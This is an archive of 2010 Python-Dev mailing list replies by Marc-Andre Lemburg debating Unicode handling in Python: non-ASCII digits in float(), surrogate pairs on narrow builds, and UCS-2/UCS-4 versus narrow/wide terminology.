Martin v. Löwis wrote: float('١٢٣٤.٥٦') 1234.56 I think it's a bug that this works. The definition of the float builtin says Convert a string or a number to floating point. If the argument is a string, it must contain a possibly signed decimal or floating point number, possibly embedded in whitespace. The argument may also be '[+|-]nan' or '[+|-]inf'. Now, one may wonder what precisely a possibly signed floating point number is, but most likely, this refers to floatnumber ::= pointfloat | exponentfloat pointfloat::= [intpart] fraction | intpart . exponentfloat ::= (intpart | pointfloat) exponent intpart ::= digit+ fraction ::= . digit+ exponent ::= (e | E) [+ | -] digit+ digit ::= 0...9 I don't see why the language spec should limit the wealth of number formats supported by float(). It is not uncommon for Asians and other non-Latin script users to use their own native script symbols for numbers. Just because these digits may look strange to someone doesn't mean that they are meaningless or should be discarded. Please also remember that Python3 now allows Unicode names for identifiers for much the same reasons. Note that the support in float() (and the other numeric constructors) to work with Unicode code points was explicitly added when Unicode support was added to Python and has been available since Python 1.6. It is not a bug by any definition of bug, even though the feature may bug someone occasionally to go read up a bit on what else the world has to offer other than Arabic numerals :-) http://en.wikipedia.org/wiki/Numeral_system -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Nov 28 2010) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Python and the Unicode Character Database
Alexander Belopolsky wrote: Two recently reported issues brought into light the fact that Python language definition is closely tied to character properties maintained by the Unicode Consortium. [1,2] For example, when Python switches to Unicode 6.0.0 (planned for the upcoming 3.2 release), we will gain two additional characters that Python can use in identifiers. [3] With Python 3.1: exec('\u0CF1 = 1') Traceback (most recent call last): File stdin, line 1, in module File string, line 1 ೱ = 1 ^ SyntaxError: invalid character in identifier but with Python 3.2a4: exec('\u0CF1 = 1') eval('\u0CF1') 1 Such changes are not new, but I agree that they should probably be highlighted in the What's new in Python x.x. Of course, the likelihood is low that this change will affect any user, but the change in str.isspace() reported in [1] is likely to cause some trouble: Python 2.6.5: u'A\u200bB'.split() [u'A', u'B'] Python 2.7: u'A\u200bB'.split() [u'A\u200bB'] That's a classical bug fix. While we have little choice but to follow UCD in defining str.isidentifier(), I think Python can promise users more stability in what it treats as space or as a digit in its builtins. Why should we divert from the work done by the Unicode Consortium ? After all, most of their changes are in fact bug fixes as well. For example, I don't think that supporting float('١٢٣٤.٥٦') 1234.56 is more important than to assure users that once their program accepted some text as a number, they can assume that the text is ASCII. Sorry, but I don't agree. If ASCII numerals are an important aspect of an application, the application should make sure that only those numerals are used (e.g. by using a regular expression for checking). In a Unicode world, not accepting non-Arabic numerals would be a limitation, not a feature. Besides Python has had this support since Python 1.6. [1] http://bugs.python.org/issue10567 [2] http://bugs.python.org/issue10557 [3] http://www.unicode.org/versions/Unicode6.0.0/#Database_Changes -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Nov 28 2010) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] len(chr(i)) = 2?
Terry Reedy wrote: On 11/24/2010 3:06 PM, Alexander Belopolsky wrote: Any non-trivial text processing is likely to be broken in presence of surrogates. Producing them on input is just trading known issue for an unknown one. Processing surrogate pairs in python code is hard. Software that has to support non-BMP characters will most likely be written for a wide build and contain subtle bugs when run under a narrow build. Note that my latest proposal does not abolish surrogates outright. Users who want them can still use something like surrogateescape error handler for non-BMP characters. It seems to me that what you are asking for is an alternate, optional, utf-8-bmp codec that would raise an error, in either direction, for non-bmp chars. Then, as you suggest, if one is not prepared for surrogates, they are not allowed. That would be a possibility as well... but I doubt that many users are going to bother, since slicing surrogates is just as bad as slicing combining code points and the latter are much more common in real life and they do happen to mostly live in the BMP. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Nov 25 2010) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] len(chr(i)) = 2?
Alexander Belopolsky wrote: On Wed, Nov 24, 2010 at 9:17 PM, Stephen J. Turnbull step...@xemacs.org wrote: .. I note that an opinion has been raised on this thread that if we want compressed internal representation for strings, we should use UTF-8. I tend to agree, but UTF-8 has been repeatedly rejected as too hard to implement. What makes UTF-16 easier than UTF-8? Only the fact that you can ignore bugs longer, in my view. That's mostly true. My guess is that we can probably ignore those bugs for as long as it takes someone to write the higher-level libraries that James suggests and MAL has actually proposed and started a PEP for. As far as I can tell, that PEP generated grand total of one comment in nine years. This may or may not be indicative of how far away we are from seeing it implemented. :-) At the time it was too early for people to start thinking about these issues. Actual use of Unicode really only started a few years ago. Since I didn't have a need for such an indexing module myself (and didn't have much time to work on it anyway), I punted on the idea. If someone else wants to pick up the idea, I'd gladly help out with the details. As far as UTF-8 vs. UCS-2/4 debate, I have an idea that may be even more far fetched. Once upon a time, Python Unicode strings supported buffer protocol and would lazily fill an internal buffer with bytes in the default encoding. In 3.x the default encoding has been fixed as UTF-8, buffer protocol support was removed from strings, but the internal buffer caching (now UTF-8) encoded representation remained. Maybe we can now implement defenc logic in reverse. Recall that strings are stored as UCS-2/4 sequences, but once buffer is requested in 2.x Python code or char* is obtained via _PyUnicode_AsStringAndSize() at the C level in 3.x, an internal buffer is filled with UTF-8 bytes and defenc is set to point to that buffer. The original idea was for that buffer to go away once we moved to Unicode for strings. Reality has shown that we still need to stick the buffer, though, since the UTF-8 representation of Unicode objects is used a lot. So the idea is for strings to store their data as UTF-8 buffer pointed by defenc upon construction. If an application uses string indexing, UTF-8 only strings will lazily fill their UCS-2/4 buffer. Proper, Unicode-aware algorithms such as grapheme, word or line iteration or simple operations such as concatenation, search or substitution would operate directly on defenc buffers. Presumably over time fewer and fewer applications would use code unit indexing that require UCS-2/4 buffer and eventually Python strings can stop supporting indexing altogether just like they stopped supporting the buffer protocol in 3.x. I don't follow you: how would UTF-8, which has even more issues with variable length representation of code points, make something easier compared to UTF-16, which has far fewer such issues and then only for non-BMP code points ? Please note that we can only provide one way of string indexing in Python using the standard s[1] notation and since we don't want that operation to be fast and no more than O(1), using the code units as items is the only reasonable way to implement it. With an indexing module, we could then let applications work based on higher level indexing schemes such as complete code points (skipping surrogates), combined code points, graphemes (ignoring e.g. most control code points and zero width code points), words (with some customizations as to where to break words, which will likely have to be language dependent), lines (which can be complicated for scripts that use columns instead ;-)), paragraphs, etc. It would also help to add transparent indexing for right-to-left scripts and text that uses both left-to-right and right-to-left text (BIDI). However, in order for these indexing methods to actually work, they will need to return references to the code units, so we cannot just drop that access method. * Back on the surrogates topic: In any case, I think this discussion is losing its grip on reality. By far, most strings you find in actual applications don't use surrogates at all, so the problem is being exaggerated. If you need to be careful about surrogates for some reason, I think a single new method .hassurrogates() on string objects would go a long way in making detection and adding special-casing for these a lot easier. If adding support for surrogates doesn't make sense (e.g. in the case of the formatting methods), then we simply punt on that and leave such handling to other tools. * Regarding preventing surrogates from entering the Python runtime: It is by far more important to maintain round-trip safety for Unicode data, than getting every bit of code work correctly with surrogates (often, there won't be a single correct way). With a new method for fast detection of surrogates, we could protect code which obviously
Re: [Python-Dev] len(chr(i)) = 2?
Alexander Belopolsky wrote: To conclude, I feel that rather than trying to fully support non-BMP characters as surrogate pairs in narrow builds, we should make it easier for application developers to avoid them. I don't understand what you're after here. Programmers can easily avoid them by not using them :-) If abandoning internal use of UTF-16 is not an option, I think we should at least add an option for decoders that currently produce surrogate pairs to treat non-BMP characters as errors and handle them according to user's choice. But what do you gain by doing this ? You'd lose the round-trip safety of those codecs and that's not a good thing. Note that most text processing APIs in Python work based on code units, which in most cases represent single code points, but in some cases can also represent surrogates (both on UCS-2 and on UCS-4 builds). E.g. str.center(n) centers the string in a padded string that is composed of n code units. Whether that operation will result in a text that's centered visually on output is a completely different story. The original string could contain surrogates, it could also contain combing code points, so the visual presentation of the result may very well not be centered at all; it may not even appear as having the length n to the user. Since we're not going change the semantics of those APIs, it is OK to not support padding with non-BMP code points on UCS-2 builds. Supporting such cases would only cause problems: * if the methods would pad with surrogates, the resulting string would no longer have length n; breaking the assumption that len(str.center(n)) == n * if the methods would pad with half the number of surroagtes to make sure that len(str.center(n)) == n, the resulting output to e.g. a terminal would be further off, than what you already have with surrogates and combining code points in the original string. More on codecs supporting surrogates: http://mail.python.org/pipermail/python-dev/2008-July/080915.html Perhaps it's time to reconsider a project I once started but that never got off the ground: http://mail.python.org/pipermail/python-dev/2008-July/080911.html Here's the pre-PEP: http://mail.python.org/pipermail/python-dev/2001-July/015938.html -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Nov 24 2010) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] len(chr(i)) = 2?
Alexander Belopolsky wrote: On Mon, Nov 22, 2010 at 1:13 PM, Raymond Hettinger raymond.hettin...@gmail.com wrote: .. Any explanation we give users needs to let them know two things: * that we cover the entire range of unicode not just BMP * that sometimes len(chr(i)) is one and sometimes two This discussion motivated me to start looking into how well Python library itself is prepared to deal with len(chr(i)) = 2. I was not surprised to find that textwrap does not handle the issue that well: len(wrap(' \U00010140' * 80, 20)) 12 len(wrap(' \U0140' * 80, 20)) 8 That module should probably be rewritten to properly implement the Unicode line breaking algorithm http://unicode.org/reports/tr14/tr14-22.html. Yet finding a bug in a str object method after a 5 min review was a bit discouraging: 'xyz'.center(20, '\U00010140') Traceback (most recent call last): File stdin, line 1, in module TypeError: The fill character must be exactly one character long Given the apparent difficulty of writing even basic text processing algorithms in presence of surrogate pairs, I wonder how wise it is to expose Python users to them. What's the alternative ? Without surrogates, Python users with UCS-2 build (e.g. the Windows Python users) would not be allowed to play with non-BMP code points. IMHO, it's better to fix the stdlib. This is a long process, as you can see with the Python3 stdlib evolution, but Python will eventually get there. As Wikipedia explains, [1] Because the most commonly used characters are all in the Basic Multilingual Plane, converting between surrogate pairs and the original values is often not tested thoroughly. This leads to persistent bugs, and potential security holes, even in popular and well-reviewed application software. Since UCS-2 (the Character Encoding Form (CEF)) is now defined [1] to cover only BMP, maybe rather than changing the terms used in the reference manual, we should tighten the code to conform to the updated standards? Can we please stop turning this around over and over again :-) UCS-2 has never supported anything other than the BMP. However, you can interpret sequences of UCS-2 code unit as UTF-16 and then get access to the full Unicode character set. We've been doing this in codecs ever since UCS-4 builds were introduced some 8-9 years ago. The change to have chr(i) return surrogates on UCS-2 builds was perhaps done too early, but then, without such changes you'd never notice that your code doesn't work well with surrogates. It's just one piece of the puzzle when going from 8-bit strings to Unicode. Again, given that the str object itself has at least one non-BMP character bug as we are closing on the third major release of py3k, how likely are 3rd party developers to get their libraries right as they port to 3.x? [1] http://en.wikipedia.org/wiki/UTF-16/UCS-2 [2] http://unicode.org/reports/tr17/#CharacterEncodingForm -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Nov 23 2010) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] len(chr(i)) = 2?
Martin, it is really irrelevant whether the standards have decided to no longer use the terms UCS-2 and UCS-4 in their latest standard documents. The definitions still stand (just like Unicode 2.0 is still a valid standard, even if it's ten years old): * UCS-2 is defined as Universal Character Set coded in 2 octets by ISO 10464: (see http://www.unicode.org/versions/Unicode5.2.0/appC.pdf) * UCS-4 is defined as Universal Character Set coded in 4 octets by ISO 10464. Those two terms have been in use for many years. They refer to the Unicode character set as it can be represented in 2 or 4 bytes. As such they don't include any of the special meanings associated with the UTF transfer encodings. There are no invalid sequences, no invalid code points, etc. as you can find in the UTF encodings. And that's an important detail. If you interpret them as encodings, they are 1-1 mappings of Unicode code point ordinals to integers represented using 2 or 4 bytes. UCS-2 only supports BMP code points and can conveniently be interpreted as UTF-16, if you need to encode non-BMP code points (which we do in the UTF codecs). UCS-4 also supports non-BMP code points directly. Now, from a ISO or Unicode Consortium point of view, deprecating the term UCS-2 in *their* standard papers is only natural, since they are actively starting to assign non-BMP code points which cannot be represented in UCS-2. However, this deprecation is only relevant for the purpose of defining the standard. The above definitions are still useful when it comes to defining code units, i.e. the used storage format, (as opposed to the transfer format). For the purpose of describing the code units we are using in Python they are (still) the most correct terms and that's also the reason why we chose to use them when introducing the configure options in Python2. There are no other accurate definitions we could use. The terms narrow and wide are simply too inaccurate to be used as description of UCS-2 and UCS-4 code units. Please also note that we have used the terms UCS-2 and UCS-4 in Python2 for 9+ years now and users are just starting to learn the difference and get acquainted with the fact that Python uses these two forms. Confronting them with narrow and wide builds is only going to cause more confusion, not less, and adding those strings to Python package files isn't going to help much either, since the terms don't convey any relationship to Unicode: package-3.1.3.linux-x86_64-py2.6_ucs2.egg vs. package-3.1.3.linux-x86_64-py2.6_narrow.egg I opt for switching to the following config options: --with-unicode=ucs2 (default) --with-unicode=ucs4 and using UCS-2 and UCS-4 in the Python documentation when describing the two different build modes. We can add glossary entries for the two which clarify the differences. Python2 used --enable-unicode=ucs2/ucs4, but since Python3 doesn't build without Unicode support, the above two versions appear more appropriate. We can keep the alternative --with-wide-unicode as an alias for --with-unicode=ucs4 to maintain 3.x backwards compatibility. Cheers, -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Nov 22 2010) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ Martin v. Löwis wrote: Am 22.11.2010 11:48, schrieb Stephen J. Turnbull: Raymond Hettinger writes: Neither UTF-16 nor UCS-2 is exactly correct anyway. From a standards lawyer point of view, UCS-2 is exactly correct, as far as I can tell upon rereading ISO 10646-1, especially Annexes H (retransmitting devices) and Q (UTF-16). Annex Q makes it clear that UTF-16 was intentionally designed so that Python-style processing could be done in a UCS-2 context. I could only find the FCD of 10646:2010, where annex H was integrated into section 10: http://www.itscj.ipsj.or.jp/sc2/open/02n4125/FCD10646-Main.pdf There they have stopped using the term UCS-2, and added a note # NOTE – Former editions of this standard included references to a # two-octet BMP form called UCS-2 which would be a subset # of the UTF-16 encoding form restricted to the BMP UCS scalar values. # The UCS-2 form is deprecated. I think they are now acknowledging that UCS-2 was a misleading term, making it ambiguous whether this refers to a CCS, a CEF, or a CES; like ASCII, people have been using it for all three of them. Apparently, the ISO WG interprets earlier
Re: [Python-Dev] len(chr(i)) = 2?
Raymond Hettinger wrote: Any explanation we give users needs to let them know two things: * that we cover the entire range of unicode not just BMP * that sometimes len(chr(i)) is one and sometimes two The term UCS-2 is a complete communications failure in that regard. If someone looks up the term, they will immediately see something like the wikipedia entry which says, UCS-2 cannot represent code points outside the BMP. How is that helpful? It's very helpful, since it explains why a UCS-2 build of Python requires a surrogates pair to represent a non-BMP code point and explains why chr(i) gives you a length 2 string rather than a length 1 string. A UCS-4 build does not need to use surrogates for this, hence you get a length 1 string from chr(i). There are two levels we have to explain to users: 1. the transfer level 2. the storage level The UTF encodings address the transfer level and is what you deal with in I/O. These provide variable length encodings of the complete Unicode code point range, regardless of whether you have a UCS-2 or a UCS-4 build. The storage level becomes important if you want to work on strings using indexing and slicing. Here you do have to know whether you're dealing with a UCS-2 or a UCS-4 build, since the indexes will vary if you're using non-BMP code points. Finally, to tie both together, we have to explain that UTF-16 (the transfer encoding) maps to UCS-2 in a straight-forward way, so it is possible to work with a UCS-2 build of Python and still use the complete Unicode code point range - you only have to take into consideration, that Python's string indexing will not necessarily point you to n-th code point in a string, but may well give you half or a surrogate. Note that while that last aspect may appear like a good argument for UCS-4 builds, in reality it is not. UCS-4 has the same issue on a different level: the letters that get printed on the screen or printer (graphemes) may well be made up of multiple combining code points, e.g. an e and an ´. Those again map to two indexes in the Python string, even though, the appear to be one character on output. Now try to explain all of the above using the terms narrow and wide (while remembering explicit is better than implicit and avoid the temptation to guess) :-) It is not really helpful to replace a correct and accurate term with a fuzzy term: either way we're stuck with the semantics. However, the correct and accurate terms at least give you a chance to figure out and understand the reasoning behind the design. UCS-2 vs. UCS-4 is a trade-off, narrow and wide is marketing talk with an implicit emphasis on one side :-) -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Nov 22 2010) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] len(chr(i)) = 2?
Victor Stinner wrote: Hi, On Friday 19 November 2010 17:53:58 Alexander Belopolsky wrote: I was recently surprised to learn that chr(i) can produce a string of length 2 in python 3.x. Yes, but only on narrow build. Eg. Debian and Ubuntu compile Python 3.1 in wide mode (sys.maxunicode == 1114111). I suspect that I am not alone finding this behavior non-obvious given that a mistake in Python manual stating the contrary survived several releases. [1] It was a documentation bug and you fixed it. Non-BMP characters are rare, so few (maybe only you?) noticed the documentation bug. I consider the behaviour as an improvment of non-BMP support of Python3. Python is unclear about non-BMP characters: narrow build was called ucs2 for long time, even if it is UTF-16 (each character is encoded to one or two UTF-16 words). No, no, no :-) UCS2 and UCS4 are more appropriate than narrow and wide or even UTF-16 and UTF-32. It'S rather common to confuse a transfer encoding with a storage format. UCS2 and UCS4 refer to code units (the storage format). You can use UCS2 and UCS4 code units to represent UTF-16 and UTF-32 resp., but those are not the same things. In UTF-16 0xD800 has a special meaning, in UCS2 it doesn't. Python uses UCS2 internally. It does not assign a special meaning to those surrogate code point ranges. However, when it comes to codecs, we do try to make use of the fact that UCS2 can easily be used to represent an UTF-16 encoding and that's why you often see surrogates being created for code points that wouldn't otherwise fit into UCS2 and you see those surrogates being converted back to single code units in UCS4 builds. I don't know who invented the terms narrow and wide builds for Python3. Not me that's for sure :-) They don't have any meaning in Unicode terminology and thus cause even more confusion than UCS2 and UCS4. E.g. the import errors you get when importing extensions built for a different Unicode version, (correctly) refer to UCS2 vs. UCS4 and now give even less of a clue that they relate to difference in Unicode builds (since these are now labeled narrow and wide). IMO, we should go back to the Python2 terms UCS2 and UCS4 which are correct and provide a clear description of what Python uses internally for code units. Python2 accepts non-BMP characters with \U syntax, but not with chr(). This is inconsistent and I see this as a bug. But I don't want to touch Python2 about non-BMP characters, and the bug is already fixed in Python3! I do believe, however that a change like this [2] and its consequences should be better publicized. Change made before the release of Python 3.0. Do you want to patch the What's new in Python 3.0? document? Perhaps add a section What we forgot to mention in 3.0 or What's not so new in 3.2 to What's new in 3.2 :-) I have not found any discussion of this change in PEPs or What's new documents. The closest find was a mentioning of a related issue #3280 in the 3.0 NEWS file. [3] Since this feature will be first documented in the Library Reference in 3.2, I wonder if it will be appropriate to mention it in What's new in 3.2? In my opinion, the question is more what was it not fixed in Python2. I suppose that the answer is something ugly like backward compatibility or historical reasons :-) Backwards compatibility. Python2 applications don't expect unichr(i) to return anything other than a single character. If you need this in Python2, it's easy enough to get around, though, with a little helper function. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Nov 19 2010) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com